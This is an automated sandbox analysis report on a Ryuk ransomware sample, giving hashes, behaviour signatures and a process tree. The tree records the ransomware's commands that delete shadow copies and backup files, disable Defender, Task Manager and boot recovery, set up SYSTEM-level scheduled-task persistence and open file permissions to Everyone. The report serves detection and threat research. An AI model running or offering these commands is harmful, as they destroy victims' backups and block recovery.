Analysis
max time kernel: 150s
max time network: 132s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09-03-2023 18:22

Static task: static1
Behavioral task: behavioral1
Sample: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
Resource: win7-20230220-en
Behavioral task: behavioral2
Sample: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
Resource: win10v2004-20230220-en

General
Target: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
Size: 885KB
MD5: 6a5bf25ff4f72ebca91280ffda057260
SHA1: 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512: 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
SSDEEP: 12288:Qm+PiUwyM02Jl5YqWYgeWYg955/155/0QebUlAAsrsKCQoZRn6X:Q5iUtklagQKUKRrsKCQON6
Malware Config
Extracted from: C:\ProgramData\RyukReadMe.txt
Emails: Vulcanteam@CYBERFEAR.COM, vulcanteam@inboxhub.net
Signatures
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
Clears Windows event logs (1 TTPs, 51 IoCs)
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
Processes: bcdedit.exe (PID 1184), bcdedit.exe (PID 1672)
Processes: wbadmin.exe (PID 3000)
Disables Task Manager via registry modification
Disables taskbar notifications via registry modification
Disables use of System Restore points (1 TTPs)
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: cmd.exe
Key value queried: \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation (cmd.exe)
Drops startup file (3 IoCs)
Processes: cmd.exe, attrib.exe
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (cmd.exe)
File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (cmd.exe)
File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (attrib.exe)
Modifies file permissions (1 TTPs, 1 IoCs)
Enumerates connected drives (3 TTPs, 42 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Drops file in Program Files directory (64 IoCs)
Drops file in Windows directory (5 IoCs)
Processes: wbadmin.exe, 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
File opened for modification: C:\Windows\Logs\WindowsBackup\WBEngine.3.etl (wbadmin.exe)
File opened for modification: C:\Windows\Logs\WindowsBackup\WBEngine.2.etl (wbadmin.exe)
File opened for modification: C:\Windows\Logs\WindowsBackup\WBEngine.1.etl (wbadmin.exe)
File created: C:\Windows\RyukReadMe.txt (0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe)
File created: C:\Windows\hrmlog1 (0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe)
Launches sc.exe (4 IoCs)
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe (PIDs 1532, 1620, 2008, 820)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) (1 TTPs, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (PIDs 1272, 4876, 4500, 3412)
Interacts with shadow copies (2 TTPs, 15 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe (PIDs 2064, 3740, 4864, 1876, 4872, 4196, 2688, 228, 1356, 3540, 2052, 680, 824, 3848, 3664)
Kills process with taskkill (5 IoCs)
Processes: taskkill.exe (PIDs 4496, 4964, 440, 4900, 4844)
Modifies registry class (1 IoCs)
Processes: cmd.exe
Key created: \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings (cmd.exe)
Opens file in notepad (likely ransom note) (1 IoCs)
Processes: NOTEPAD.EXE (PID 4428)
Runs net.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 5 IoCs
Processes:
pid   process
292   attrib.exe
3668  attrib.exe
4460  attrib.exe
220   attrib.exe
4732  attrib.exe
Processes
(Indentation shows parent/child depth in the process tree. Each entry gives the image path, the recorded command line, and the behaviours flagged for that process.)

C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\schtasks.exe
      cmd: schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      - Creates scheduled task(s)
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
    - Drops startup file
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\schtasks.exe
      cmd: schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
      - Creates scheduled task(s)
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\attrib.exe
      cmd: attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      - Drops startup file
      - Views/modifies file attributes
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\schtasks.exe
      cmd: schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F
      - Creates scheduled task(s)
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\schtasks.exe
      cmd: schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F
      - Creates scheduled task(s)
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\attrib.exe
      cmd: attrib +h +s ryuk.exe
      - Views/modifies file attributes
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\attrib.exe
      cmd: attrib +h +s C:\ProgramData\ryuk.exe
      - Views/modifies file attributes
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe
      cmd: cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\icacls.exe
        cmd: icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        - Modifies file permissions
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe
      cmd: cmd.exe /c taskkill /t /f /im sql*
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\taskkill.exe
        cmd: taskkill /t /f /im sql*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\taskkill.exe
      cmd: taskkill /f /t /im veeam*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    C:\Windows\system32\reg.exe
      cmd: reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
    C:\Windows\system32\cmd.exe
      cmd: cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
      - Checks computer location settings
      - Modifies registry class
      C:\Windows\system32\NOTEPAD.EXE
        cmd: "C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt
        - Opens file in notepad (likely ransom note)
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
    C:\Windows\system32\cmd.exe
      cmd: cmd.exe /c vssadmin Delete Shadows /All /Quiet
      C:\Windows\system32\vssadmin.exe
        cmd: vssadmin Delete Shadows /All /Quiet
        - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
    C:\Windows\system32\cmd.exe
      cmd: cmd.exe /c wmic shadowcopy delete
      C:\Windows\System32\Wbem\WMIC.exe
        cmd: wmic shadowcopy delete
        - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
    C:\Windows\system32\cmd.exe
      cmd: cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
      C:\Windows\system32\bcdedit.exe
        cmd: bcdedit /set {default} boostatuspolicy ignoreallfailures
        - Modifies boot configuration data using bcdedit
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
    C:\Windows\system32\cmd.exe
      cmd: cmd.exe /c bcdedit /set {default} recoveryenabled no
      C:\Windows\system32\bcdedit.exe
        cmd: bcdedit /set {default} recoveryenabled no
        - Modifies boot configuration data using bcdedit
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
    C:\Windows\system32\cmd.exe
      cmd: cmd.exe /c wbadmin delete catalog -quiet/
      C:\Windows\system32\wbadmin.exe
        cmd: wbadmin delete catalog -quiet/
        - Deletes backup catalog
        - Drops file in Windows directory
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c net stop avpsus /y
    C:\Windows\system32\net.exe
      cmd: net stop avpsus /y
      C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop avpsus /y
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
    C:\Windows\system32\net.exe
      cmd: net stop McAfeeDLPAgentService /y
      C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c net stop mfewc /y
    C:\Windows\system32\net.exe
      cmd: net stop mfewc /y
      C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop mfewc /y
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
    C:\Windows\system32\net.exe
      cmd: net stop BMR Boot Service /y
      C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop BMR Boot Service /y
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
    C:\Windows\system32\net.exe
      cmd: net stop NetBackup BMR MTFTP Service /y
      C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
    C:\Windows\system32\sc.exe
      cmd: sc config SQLTELEMETRY start=disabled
      - Launches sc.exe
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
    C:\Windows\system32\sc.exe
      cmd: sc config SQLTELEMETRY$ECWDB2 start= disabled
      - Launches sc.exe
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
    C:\Windows\system32\sc.exe
      cmd: sc config SQLWriter start= disabled
      - Launches sc.exe
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
    C:\Windows\system32\sc.exe
      cmd: sc config SstpSvc start= disabled
      - Launches sc.exe
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
    C:\Windows\system32\taskkill.exe
      cmd: taskkill /IM mspub.exe /F
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
    C:\Windows\system32\taskkill.exe
      cmd: taskkill /IM mydesktopqos.exe /F
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
    C:\Windows\system32\taskkill.exe
      cmd: taskkill /IM mydesktopservice.exe /F
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin Delete Shadows /all /quiet
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
    C:\Windows\system32\vssadmin.exe
      cmd: vssadmin Delete Shadows /all /quiet
      - Interacts with shadow copies
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c del %0
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
    C:\Windows\system32\attrib.exe
      cmd: attrib +h +s hrmlog2
      - Views/modifies file attributes
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
    C:\Windows\system32\attrib.exe
      cmd: attrib +h +s C:\ProgramData\hrmlog2
      - Views/modifies file attributes
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe
      cmd: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  C:\Windows\system32\cmd.exe
